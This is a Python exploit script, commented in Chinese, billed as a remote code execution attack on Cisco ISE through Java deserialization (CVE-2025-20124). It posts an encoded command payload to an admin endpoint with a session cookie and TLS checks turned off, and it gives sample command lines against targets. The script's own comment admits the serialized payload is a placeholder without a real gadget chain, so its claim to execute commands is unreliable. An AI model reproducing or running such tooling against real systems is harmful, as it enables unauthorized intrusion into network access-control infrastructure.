1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import requests
import sys
import argparse
import base64
import urllib3
urllib3.disable_warnings()

def banner():
    print(r"""
_________ .__                     
\_   ___ \|__| ______ ____  ____  
/    \  \/|  |/  ___// ___\/  _ \ 
\     \___|  |\___ \\  \__(  <_> )
 \______  /__/____  >\___  >____/ 
        \/        \/     \/     
                                          
Cisco ISE Java反序列化RCE
CVE-2025-20124
作者：ibrahmsql | github.com/ibrahmsql
""")

def build_serialize_payload(cmd):
    """
    Java反序列化payload构建器
    """
    java_cmd = cmd.replace('"', '\\"')
    # 占位符序列化 - 实际利用需要gadget chain
    payload = f'\xac\xed\x00\x05sr\x00...ExecGadget...execute("{java_cmd}")'
    return base64.b64encode(payload.encode()).decode()

def exploit_deserialization(base_url, session_token, cmd):
    """
    CVE-2025-20124: Java反序列化RCE
    """
    endpoint = f"{base_url}/api/v1/admin/deserializer"
    headers = {
        "Cookie": f"ISESSIONID={session_token}",
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (compatible; ISE-Exploit)"
    }
    
    payload = build_serialize_payload(cmd)
    data = {"object": payload}
    
    print(f"[+] 目标: {base_url}")
    print(f"[+] 端点: {endpoint}")
    print(f"[+] 命令: {cmd}")
    print(f"[+] 发送反序列化payload...")
    
    try:
        r = requests.post(endpoint, json=data, headers=headers, verify=False, timeout=10)
        
        if r.status_code == 200:
            print("[+] Payload发送成功!")
            print("[+] 命令可能已执行!")
            if r.text:
                print(f"[+] 响应: {r.text[:500]}")
        elif r.status_code == 401:
            print("[-] 认证失败 - 无效的会话token")
        elif r.status_code == 403:
            print("[-] 访问被拒绝 - 权限不足")
        elif r.status_code == 404:
            print("[-] 端点未找到 - 目标可能不受影响")
        else:
            print(f"[-] 意外响应: {r.status_code}")
            print(f"[-] 响应: {r.text[:200]}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] 请求失败: {e}")

def main():
    parser = argparse.ArgumentParser(
        description="CVE-2025-20124 - Cisco ISE Java反序列化RCE",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
示例:
  python3 CVE-2025-20124.py --url https://ise.company.com --session ABCD1234 --cmd "id"
  python3 CVE-2025-20124.py --url https://10.0.0.1:9060 --session TOKEN123 --cmd "whoami"
        """
    )
    
    parser.add_argument("--url", required=True, help="Cisco ISE设备的基础URL")
    parser.add_argument("--session", required=True, help="认证的ISE会话token")
    parser.add_argument("--cmd", required=True, help="通过反序列化执行的命令")
    
    args = parser.parse_args()
    
    banner()
    
    # URL验证
    if not args.url.startswith(('http://', 'https://')):
        print("[-] URL必须以http://或https://开头")
        sys.exit(1)
    
    exploit_deserialization(args.url, args.session, args.cmd)

if __name__ == "__main__":
    main()